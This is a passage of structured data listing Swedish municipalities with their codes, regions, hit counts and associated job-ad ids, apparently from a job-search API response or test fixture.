'ad_ids': ['24649508', '24649463', '24643147', '24642006', '24636125', '24620822', '24616700', '24600203',
'24575057', '24566977']},
{'id': 'Bbs5_JUs_Qh5', 'name': 'Håbo', 'type': 'municipality', 'code': '0305', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 5, 'ad_ids': ['24650354', '24645507', '24643909', '24562714', '24485221']},
{'id': 'cbyw_9aK_Cni', 'name': 'Älvkarleby', 'type': 'municipality', 'code': '0319', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 1, 'ad_ids': ['24623380']},
{'id': 'KALq_sG6_VrW', 'name': 'Knivsta', 'type': 'municipality', 'code': '0330', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 5, 'ad_ids': ['24634631', '24610544', '24593401', '24577340', '24499916']},
{'id': 'K8A2_JBa_e6e', 'name': 'Tierp', 'type': 'municipality', 'code': '0360', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 5, 'ad_ids': ['24646413', '24642957', '24632440', '24629420', '24593674']},
{'id': 'otaF_bQY_4ZD', 'name': 'Uppsala', 'type': 'municipality', 'code': '0380', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 116,
'ad_ids': ['24650128', '24649375', '24649111', '24648825', '24648007', '24641555', '24647083', '24642165',
'24645085', '24643472']},
{'id': 'HGwg_unG_TsG', 'name': 'Enköping', 'type': 'municipality', 'code': '0381', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 31,
'ad_ids': ['24649986', '24640955', '24636030', '24634261', '24634124', '24633958', '24633755', '24632200',
'24631332', '24630750']},
{'id': 'VE3L_3Ei_XbG', 'name': 'Östhammar', 'type': 'municipality', 'code': '0382', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 7,
'ad_ids': ['24636870', '24620508', '24610180', '24602559', '24545246', '24528574', '24456277']},
{'id': 'rut9_f5W_kTX', 'name': 'Vingåker', 'type': 'municipality', 'code': '0428', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 3, 'ad_ids': ['24630384', '24611402', '24610522']},
{'id': 'os8Y_RUo_U3u', 'name': 'Gnesta', 'type': 'municipality', 'code': '0461', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 7,
'ad_ids': ['24624678', '24614695', '24606086', '24539789', '24527883', '24452669', '24437897']},
{'id': 'KzvD_ePV_DKQ', 'name': 'Nyköping', 'type': 'municipality', 'code': '0480', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 32,
'ad_ids': ['24648507', '24647220', '24646241', '24644029', '24643813', '24640685', '24638209', '24621102',
'24619295', '24618870']},
{'id': '72XK_mUU_CAH', 'name': 'Oxelösund', 'type': 'municipality', 'code': '0481', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 6,
'ad_ids': ['24650534', '24638207', '24635193', '24627634', '24572186', '24470292']},
{'id': 'P8yp_WT9_Bks', 'name': 'Flen', 'type': 'municipality', 'code': '0482', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 8,
'ad_ids': ['24642920', '24642061', '24617764', '24617668', '24584928', '24570283', '24457975', '24252077']},
{'id': 'snx9_qVD_Dr1', 'name': 'Katrineholm', 'type': 'municipality', 'code': '0483', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 11,
'ad_ids': ['24641421', '24640118', '24638917', '24634274', '24632221', '24627764', '24624267', '24572047',
'24499697', '24462987']},
{'id': 'kMxr_NiX_YrU', 'name': 'Eskilstuna', 'type': 'municipality', 'code': '0484', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 37,
'ad_ids': ['24649500', '24648293', '24642848', '24642008', '24635208', '24634840', '24634180', '24624433',
'24623481', '24622346']},
{'id': 'shnD_RiE_RKL', 'name': 'Strängnäs', 'type': 'municipality', 'code': '0486', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 13,
'ad_ids': ['24645062', '24640755', '24633881', '24629018', '24628036', '24626818', '24620342', '24617315',
'24613763', '24606350']},
{'id': 'rjzu_nQn_mCK', 'name': 'Trosa', 'type': 'municipality', 'code': '0488', 'region_code': '04',
'region_name': 'Södermanlands län', 'hits': 6,
'ad_ids': ['24629673', '24617357', '24615644', '24601519', '24573221', '24568390']},
{'id': 'Fu8g_29u_3xF', 'name': 'Ödeshög', 'type': 'municipality', 'code': '0509', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 4, 'ad_ids': ['24633236', '24604733', '24604699', '24536516']},
{'id': 'vRRz_nLT_vYv', 'name': 'Ydre', 'type': 'municipality', 'code': '0512', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 1, 'ad_ids': ['24489383']},
{'id': 'U4XJ_hYF_FBA', 'name': 'Kinda', 'type': 'municipality', 'code': '0513', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 4, 'ad_ids': ['24640366', '24620200', '24513240', '24434591']},
{'id': 'e5LB_m9V_TnT', 'name': 'Boxholm', 'type': 'municipality', 'code': '0560', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 1, 'ad_ids': ['24614590']},
{'id': 'bFWo_FRJ_x2T', 'name': 'Åtvidaberg', 'type': 'municipality', 'code': '0561', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 1, 'ad_ids': ['24614818']},
{'id': 'dMFe_J6W_iJv', 'name': 'Finspång', 'type': 'municipality', 'code': '0562', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 7,
'ad_ids': ['24644134', '24625540', '24612693', '24611379', '24590409', '24583823', '24471628']},
{'id': 'Sb3D_iGB_aXu', 'name': 'Valdemarsvik', 'type': 'municipality', 'code': '0563', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 3, 'ad_ids': ['24645130', '24645129', '24597478']},
{'id': 'bm2x_1mr_Qhx', 'name': 'Linköping', 'type': 'municipality', 'code': '0580', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 110,
'ad_ids': ['24650847', '24650299', '24650286', '24650132', '24650066', '24649942', '24649791', '24649190',
'24648447', '24647737']},
{'id': 'SYty_Yho_JAF', 'name': 'Norrköping', 'type': 'municipality', 'code': '0581', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 77,
'ad_ids': ['24645698', '24644342', '24642624', '24642581', '24642596', '24638971', '24637959', '24636774',
'24635847', '24635810']},
{'id': 'Pcv9_yYh_Uw8', 'name': 'Söderköping', 'type': 'municipality', 'code': '0582', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 5,
'ad_ids': ['24643307', '24593500', '24592848', '24579758', '24540435']},
{'id': 'E1MC_1uG_phm', 'name': 'Motala', 'type': 'municipality', 'code': '0583', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 13,
'ad_ids': ['24650644', '24647728', '24647601', '24644258', '24639992', '24635027', '24627968', '24625493',
'24611718', '24574665']},
{'id': 'VcCU_Y86_eKU', 'name': 'Vadstena', 'type': 'municipality', 'code': '0584', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 6,
'ad_ids': ['24636656', '24631849', '24613868', '24605632', '24597399', '24579124']},
{'id': 'stqv_JGB_x8A', 'name': 'Mjölby', 'type': 'municipality', 'code': '0586', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 17,
'ad_ids': ['24648019', '24644313', '24632147', '24628098', '24622278', '24616742', '24596459', '24615796',
'24613095', '24605455']},
{'id': 'yaHU_E7z_YnE', 'name': 'Lekeberg', 'type': 'municipality', 'code': '1814', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 3, 'ad_ids': ['24618574', '24590700', '24573858']},
{'id': 'oYEQ_m8Q_unY', 'name': 'Laxå', 'type': 'municipality', 'code': '1860', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24613284']},
{'id': 'Ak9V_rby_yYS', 'name': 'Hallsberg', 'type': 'municipality', 'code': '1861', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 5, 'ad_ids': ['24645029', '24641916', '24630258', '24625794', '23791205']},
{'id': 'pvzC_muj_rcq', 'name': 'Degerfors', 'type': 'municipality', 'code': '1862', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24640136', '24612483']},
{'id': 'sCbY_r36_xhs', 'name': 'Hällefors', 'type': 'municipality', 'code': '1863', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24597505', '24562629']},
{'id': 'eF2n_714_hSU', 'name': 'Ljusnarsberg', 'type': 'municipality', 'code': '1864', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24620853']},
{'id': 'kuMn_feU_hXx', 'name': 'Örebro', 'type': 'municipality', 'code': '1880', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 83,
'ad_ids': ['24650582', '24650365', '24649289', '24649147', '24648442', '24648272', '24648247', '24647801',
'24646747', '24646234']},
{'id': 'viCA_36P_pQp', 'name': 'Kumla', 'type': 'municipality', 'code': '1881', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 6,
'ad_ids': ['24628041', '24627103', '24620812', '24612404', '24591455', '24525516']},
{'id': 'dbF7_Ecz_CWF', 'name': 'Askersund', 'type': 'municipality', 'code': '1882', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24614139']},
{'id': 'wgJm_upX_z5W', 'name': 'Karlskoga', 'type': 'municipality', 'code': '1883', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 14,
'ad_ids': ['24641108', '24640044', '24638125', '24627556', '24626010', '24619701', '24614690', '24596123',
'24574044', '24506835']},
{'id': 'WFXN_hsU_gmx', 'name': 'Nora', 'type': 'municipality', 'code': '1884', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24645958', '24641024']},
{'id': 'JQE9_189_Ska', 'name': 'Lindesberg', 'type': 'municipality', 'code': '1885', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 9,
'ad_ids': ['24621412', '24640141', '24640009', '24631398', '24629694', '24619671', '24594052', '24563255',
'24559937']},
{'id': 'Nufj_vmt_VrH', 'name': 'Skinnskatteberg', 'type': 'municipality', 'code': '1904', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24616844', '24561824']},
{'id': 'jfD3_Hdg_UhT', 'name': 'Surahammar', 'type': 'municipality', 'code': '1907', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24569744', '24569099']},
{'id': 'sD2e_1Tr_4WZ', 'name': 'Heby', 'type': 'municipality', 'code': '0331', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 6,
'ad_ids': ['24639987', '24637102', '24636561', '24622419', '24609485', '24606439']},
{'id': 'Fac5_h7a_UoM', 'name': 'Kungsör', 'type': 'municipality', 'code': '1960', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615040']},
{'id': 'oXYf_HmD_ddE', 'name': 'Hallstahammar', 'type': 'municipality', 'code': '1961', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 3, 'ad_ids': ['24620856', '24620183', '24570400']},
{'id': 'jbVe_Cps_vtd', 'name': 'Norberg', 'type': 'municipality', 'code': '1962', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615173']},
{'id': '8deT_FRF_2SP', 'name': 'Västerås', 'type': 'municipality', 'code': '1980', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 53,
'ad_ids': ['24650320', '24648681', '24647561', '24647061', '24646018', '24645554', '24645115', '24643524',
'24643419', '24641832']},
{'id': 'dAen_yTK_tqz', 'name': 'Sala', 'type': 'municipality', 'code': '1981', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 9,
'ad_ids': ['24647939', '24629771', '24628165', '24627608', '24625106', '24625081', '24618592', '24607178',
'24568713']},
{'id': '7D9G_yrX_AGJ', 'name': 'Fagersta', 'type': 'municipality', 'code': '1982', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24642864', '24636952', '24621583', '24611864', '24610150', '24596200']},
{'id': '4Taz_AuG_tSm', 'name': 'Köping', 'type': 'municipality', 'code': '1983', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 5,
'ad_ids': ['24641084', '24633855', '24614521', '24579728', '24554788']},
{'id': 'Jkyb_5MQ_7pB', 'name': 'Arboga', 'type': 'municipality', 'code': '1984', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24634844', '24632224', '24630389', '24629338', '24628382', '24523724']},
{'id': '1gEC_kvM_TXK', 'name': 'Olofström', 'type': 'municipality', 'code': '1060', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 3, 'ad_ids': ['24650780', '24607103', '24588059']},
{'id': 'YSt4_bAa_ccs', 'name': 'Karlskrona', 'type': 'municipality', 'code': '1080', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 28,
'ad_ids': ['24651075', '24649518', '24649448', '24645432', '24645121', '24644839', '24628869', '24633251',
'24633023', '24630721']},
{'id': 'vH8x_gVz_z7R', 'name': 'Ronneby', 'type': 'municipality', 'code': '1081', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 10,
'ad_ids': ['24648307', '24648283', '24635765', '24621669', '24621710', '24620613', '24605177', '24605428',
'24603527', '24590026']},
{'id': 'HtGW_WgR_dpE', 'name': 'Karlshamn', 'type': 'municipality', 'code': '1082', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 15,
'ad_ids': ['24649847', '24649768', '24647740', '24632517', '24612809', '24607875', '24607874', '24602594',
'24600682', '24600425']},
{'id': 'EVPy_phD_8Vf', 'name': 'Sölvesborg', 'type': 'municipality', 'code': '1083', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 4, 'ad_ids': ['24644857', '24625704', '24620694', '24535492']},
{'id': '2r6J_g2w_qp5', 'name': 'Svalöv', 'type': 'municipality', 'code': '1214', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24645986']},
{'id': 'vBrj_bov_KEX', 'name': 'Staffanstorp', 'type': 'municipality', 'code': '1230', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24648873', '24623551', '24614129', '24598158', '24593510', '24562275', '24565177', '24514487']},
{'id': '64g5_Lio_aMU', 'name': 'Burlöv', 'type': 'municipality', 'code': '1231', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 9,
'ad_ids': ['24649934', '24624002', '24615590', '24596313', '24598750', '24592314', '24583797', '24565624',
'24440835']},
{'id': 'Tcog_5sH_b46', 'name': 'Vellinge', 'type': 'municipality', 'code': '1233', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24637147', '24622105', '24546803']},
{'id': 'LTt7_CGG_RUf', 'name': '<NAME>', 'type': 'municipality', 'code': '1256', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24615444', '24610769', '24593919', '24589529']},
{'id': 'nBTS_Nge_dVH', 'name': 'Örkelljunga', 'type': 'municipality', 'code': '1257', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24620885']},
{'id': 'waQp_FjW_qhF', 'name': 'Bjuv', 'type': 'municipality', 'code': '1260', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 2, 'ad_ids': ['24614178', '24590365']},
{'id': '5ohg_WJU_Ktn', 'name': 'Kävlinge', 'type': 'municipality', 'code': '1261', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24645728', '24640743', '24637954', '24634361', '24631933', '24622076', '24615122', '24601405',
'24584558', '24570281']},
{'id': 'naG4_AUS_z2v', 'name': 'Lomma', 'type': 'municipality', 'code': '1262', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 10,
'ad_ids': ['24650188', '24649514', '24630578', '24607479', '24607474', '24593043', '24587683', '24555292',
'24549470', '24500680']},
{'id': 'n6r4_fjK_kRr', 'name': 'Svedala', 'type': 'municipality', 'code': '1263', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24648311', '24624676', '24615959', '24590287']},
{'id': 'oezL_78x_r89', 'name': 'Skurup', 'type': 'municipality', 'code': '1264', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24606877', '24596998', '24590239', '24555159']},
{'id': 'P3Cs_1ZP_9XB', 'name': 'Sjöbo', 'type': 'municipality', 'code': '1265', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24636041', '24624217', '24572488', '24562106', '24415688']},
{'id': 'autr_KMa_cfp', 'name': 'Hörby', 'type': 'municipality', 'code': '1266', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24647623', '24612427', '24598016', '24585770', '24576073', '24575956', '24388252']},
{'id': 'N29z_AqQ_Ppc', 'name': 'Höör', 'type': 'municipality', 'code': '1267', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24645789', '24611931', '24590427', '24580373', '24533802', '24524712', '24505268', '24495006']},
{'id': 'UMev_wGs_9bg', 'name': 'Tomelilla', 'type': 'municipality', 'code': '1270', 'region_code': '12',
'region_name': '<NAME>', 'hits': 5, 'ad_ids': ['24629168', '24624712', '24621866', '24620688', '24616138']},
{'id': 'WMNK_PXa_Khm', 'name': 'Bromölla', 'type': 'municipality', 'code': '1272', 'region_code': '12',
'region_name': '<NAME>', 'hits': 8,
'ad_ids': ['24648756', '24645758', '24645101', '24624728', '24584175', '24582959', '24513573', '24513519']},
{'id': 'najS_Lvy_mDD', 'name': 'Osby', 'type': 'municipality', 'code': '1273', 'region_code': '12',
'region_name': '<NAME>', 'hits': 6,
'ad_ids': ['24622447', '24612064', '24590486', '24584265', '24570384', '24484317']},
{'id': 'BN7r_iPV_F9p', 'name': 'Perstorp', 'type': 'municipality', 'code': '1275', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24644535', '24620267', '24590493']},
{'id': 'JARU_FAY_hTS', 'name': 'Klippan', 'type': 'municipality', 'code': '1276', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24649729', '24645668', '24630230', '24630125', '24627948', '24613981', '24602922', '24592988',
'24587696', '24576122']},
{'id': 'tEv6_ktG_QQb', 'name': 'Åstorp', 'type': 'municipality', 'code': '1277', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24646009', '24643953', '24611585', '24576459', '24572768', '24572674', '24488210']},
{'id': 'i8vK_odq_6ar', 'name': 'Båstad', 'type': 'municipality', 'code': '1278', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 6,
'ad_ids': ['24648777', '24642713', '24635648', '24546923', '24546926', '24437820']},
{'id': 'oYPt_yRA_Smm', 'name': 'Malmö', 'type': 'municipality', 'code': '1280', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 208,
'ad_ids': ['24650545', '24650520', '24650296', '24650097', '24650060', '24649950', '24648137', '24647586',
'24647704', '24647414']},
{'id': 'muSY_tsR_vDZ', 'name': 'Lund', 'type': 'municipality', 'code': '1281', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 94,
'ad_ids': ['24650438', '24650135', '24649589', '24648781', '24647011', '24647010', '24646930', '24646668',
'24645906', '24645894']},
{'id': 'Yt5s_Vf9_rds', 'name': 'Landskrona', 'type': 'municipality', 'code': '1282', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 13,
'ad_ids': ['24644146', '24644087', '24620576', '24620131', '24615771', '24573791', '24570452', '24567461',
'24540874', '24488640']},
{'id': 'qj3q_oXH_MGR', 'name': 'Helsingborg', 'type': 'municipality', 'code': '1283', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 75,
'ad_ids': ['24649269', '24648344', '24647195', '24645865', '24645699', '24644730', '24644155', '24643877',
'24643808', '24643688']},
{'id': '8QQ6_e95_a1d', 'name': 'Höganäs', 'type': 'municipality', 'code': '1284', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24634533', '24625162', '24623134', '24620349', '24576341']},
{'id': 'gfCw_egj_1M4', 'name': 'Eslöv', 'type': 'municipality', 'code': '1285', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 7,
'ad_ids': ['24634664', '24629637', '24616790', '24608987', '24607603', '24603214', '24500582']},
{'id': 'hdYk_hnP_uju', 'name': 'Ystad', 'type': 'municipality', 'code': '1286', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 11,
'ad_ids': ['24644036', '24625823', '24601172', '24599304', '24583510', '24574648', '24572130', '24511562',
'24511260', '24473915']},
{'id': 'STvk_dra_M1X', 'name': 'Trelleborg', 'type': 'municipality', 'code': '1287', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 18,
'ad_ids': ['24649417', '24645920', '24645911', '24640015', '24632826', '24630587', '24614377', '24608596',
'24608211', '24604616']},
{'id': 'vrvW_sr8_1en', 'name': 'Kristianstad', 'type': 'municipality', 'code': '1290', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 36,
'ad_ids': ['24649118', '24646547', '24645051', '24642902', '24639033', '24636394', '24636028', '24633571',
'24631796', '24623098']},
{'id': 'dLxo_EpC_oPe', 'name': 'Simrishamn', 'type': 'municipality', 'code': '1291', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 5, 'ad_ids': ['24636522', '24601452', '24550006', '24554806', '24502004']},
{'id': 'pCuv_P5A_9oh', 'name': 'Ängelholm', 'type': 'municipality', 'code': '1292', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 29,
'ad_ids': ['24648062', '24646052', '24645263', '24644897', '24643870', '24643102', '24642941', '24641238',
'24641268', '24635578']},
{'id': 'bP5q_53x_aqJ', 'name': 'Hässleholm', 'type': 'municipality', 'code': '1293', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 20,
'ad_ids': ['24645166', '24639356', '24625756', '24621467', '24614517', '24615762', '24610880', '24605726',
'24588549', '24597762']},
{'id': 'ocMw_Rz5_B1L', 'name': 'Kil', 'type': 'municipality', 'code': '1715', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 3, 'ad_ids': ['24649278', '24649261', '24492496']},
{'id': 'N5HQ_hfp_7Rm', 'name': 'Eda', 'type': 'municipality', 'code': '1730', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 8,
'ad_ids': ['24650359', '24649389', '24641459', '24638309', '24625958', '24625946', '24621089', '24601242']},
{'id': 'hQdb_zn9_Sok', 'name': 'Torsby', 'type': 'municipality', 'code': '1737', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 6,
'ad_ids': ['24649740', '24649672', '24641489', '24622563', '24547171', '24539768']},
{'id': 'mPt5_3QD_LTM', 'name': 'Storfors', 'type': 'municipality', 'code': '1760', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24605489', '24586914']},
{'id': 'x5qW_BXr_aut', 'name': 'Hammarö', 'type': 'municipality', 'code': '1761', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24612858', '24606451']},
{'id': 'x73h_7rW_mXN', 'name': 'Munkfors', 'type': 'municipality', 'code': '1762', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 1, 'ad_ids': ['24546455']},
{'id': 'xnEt_JN3_GkA', 'name': 'Forshaga', 'type': 'municipality', 'code': '1763', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24612399', '24602480']},
{'id': 'PSNt_P95_x6q', 'name': 'Grums', 'type': 'municipality', 'code': '1764', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 2, 'ad_ids': ['24539560', '24566552']},
{'id': 'ymBu_aFc_QJA', 'name': 'Årjäng', 'type': 'municipality', 'code': '1765', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 1, 'ad_ids': ['24621703']},
{'id': 'oqNH_cnJ_Tdi', 'name': 'Sunne', 'type': 'municipality', 'code': '1766', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 4, 'ad_ids': ['24642867', '24622363', '24601636', '24590484']},
{'id': 'hRDj_PoV_sFU', 'name': 'Karlstad', 'type': 'municipality', 'code': '1780', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 49,
'ad_ids': ['24650860', '24645012', '24642294', '24641834', '24641215', '24641140', '24639997', '24637408',
'24635991', '24635497']},
{'id': 'SVQS_uwJ_m2B', 'name': 'Kristinehamn', 'type': 'municipality', 'code': '1781', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 5, 'ad_ids': ['24649351', '24646057', '24617982', '24610610', '24535779']},
{'id': 'UXir_vKD_FuW', 'name': 'Filipstad', 'type': 'municipality', 'code': '1782', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 0, 'ad_ids': []},
{'id': 'qk9a_g5U_sAH', 'name': 'Hagfors', 'type': 'municipality', 'code': '1783', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 3, 'ad_ids': ['24632958', '24614330', '24504796']},
{'id': 'yGue_F32_wev', 'name': 'Arvika', 'type': 'municipality', 'code': '1784', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 5, 'ad_ids': ['24626919', '24595432', '24594812', '24591333', '24532373']},
{'id': 'wmxQ_Guc_dsy', 'name': 'Säffle', 'type': 'municipality', 'code': '1785', 'region_code': '17',
'region_name': 'Värmlands län', 'hits': 5, 'ad_ids': ['24649317', '24612041', '24574208', '24558595', '24381921']},
{'id': '4eS9_HX1_M7V', 'name': 'Vansbro', 'type': 'municipality', 'code': '2021', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 2, 'ad_ids': ['24602964', '24464433']},
{'id': 'FPCd_poj_3tq', 'name': 'Malung-Sälen', 'type': 'municipality', 'code': '2023', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 5, 'ad_ids': ['24649158', '24617319', '24608124', '24606239', '24544803']},
{'id': 'Nn7p_W3Z_y68', 'name': 'Gagnef', 'type': 'municipality', 'code': '2026', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 1, 'ad_ids': ['24649209']},
{'id': '7Zsu_ant_gcn', 'name': 'Leksand', 'type': 'municipality', 'code': '2029', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 3, 'ad_ids': ['24640824', '24626128', '24571716']},
{'id': 'Jy3D_2ux_dg8', 'name': 'Rättvik', 'type': 'municipality', 'code': '2031', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 4, 'ad_ids': ['24647031', '24647028', '24621580', '24595880']},
{'id': 'CRyF_5Jg_4ht', 'name': 'Orsa', 'type': 'municipality', 'code': '2034', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 6,
'ad_ids': ['24629334', '24608617', '24566875', '24561183', '24523938', '24488375']},
{'id': 'cZtt_qGo_oBr', 'name': 'Älvdalen', 'type': 'municipality', 'code': '2039', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 4, 'ad_ids': ['24626713', '24621302', '24576229', '24576225']},
{'id': '5zZX_8FH_Sbq', 'name': 'Smedjebacken', 'type': 'municipality', 'code': '2061', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 3, 'ad_ids': ['24645686', '24645204', '24593349']},
{'id': 'UGcC_kYx_fTs', 'name': 'Mora', 'type': 'municipality', 'code': '2062', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 12,
'ad_ids': ['24648097', '24624498', '24623037', '24623017', '24593694', '24587438', '24585960', '24572253',
'24548037', '24539727']},
{'id': 'N1wJ_Cuu_7Cs', 'name': 'Falun', 'type': 'municipality', 'code': '2080', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 33,
'ad_ids': ['24649195', '24646230', '24642403', '24640180', '24639093', '24637700', '24633983', '24628486',
'24622858', '24621668']},
{'id': 'cpya_jJg_pGp', 'name': 'Borlänge', 'type': 'municipality', 'code': '2081', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 22,
'ad_ids': ['24648735', '24645716', '24643955', '24640978', '24638705', '24634803', '24627930', '24624426',
'24620908', '24615413']},
{'id': 'c3Zx_jBf_CqF', 'name': 'Säter', 'type': 'municipality', 'code': '2082', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 3, 'ad_ids': ['24646152', '24564510', '24638537']},
{'id': 'DE9u_V4K_Z1S', 'name': 'Hedemora', 'type': 'municipality', 'code': '2083', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 5, 'ad_ids': ['24617875', '24596329', '24595146', '24577346', '24518006']},
{'id': 'Szbq_2fg_ydQ', 'name': 'Avesta', 'type': 'municipality', 'code': '2084', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 4, 'ad_ids': ['24643237', '24616778', '24612778', '24596510']},
{'id': 'Ny2b_2bo_7EL', 'name': 'Ludvika', 'type': 'municipality', 'code': '2085', 'region_code': '20',
'region_name': 'Dalarnas län', 'hits': 15,
'ad_ids': ['24641952', '24640038', '24636562', '24636403', '24636399', '24636392', '24627279', '24618666',
'24608534', '24607134']},
{'id': 'GEvW_wKy_A9H', 'name': 'Ockelbo', 'type': 'municipality', 'code': '2101', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 3, 'ad_ids': ['24647677', '24644885', '24636701']},
{'id': 'yuNd_3bg_ttc', 'name': 'Hofors', 'type': 'municipality', 'code': '2104', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 2, 'ad_ids': ['24643718', '24638172']},
{'id': 'JPSe_mUQ_NDs', 'name': 'Ovanåker', 'type': 'municipality', 'code': '2121', 'region_code': '21',
'region_name': 'Gävleborgs län', 'hits': 3, 'ad_ids': ['24648796', '24626141', '24588647']},
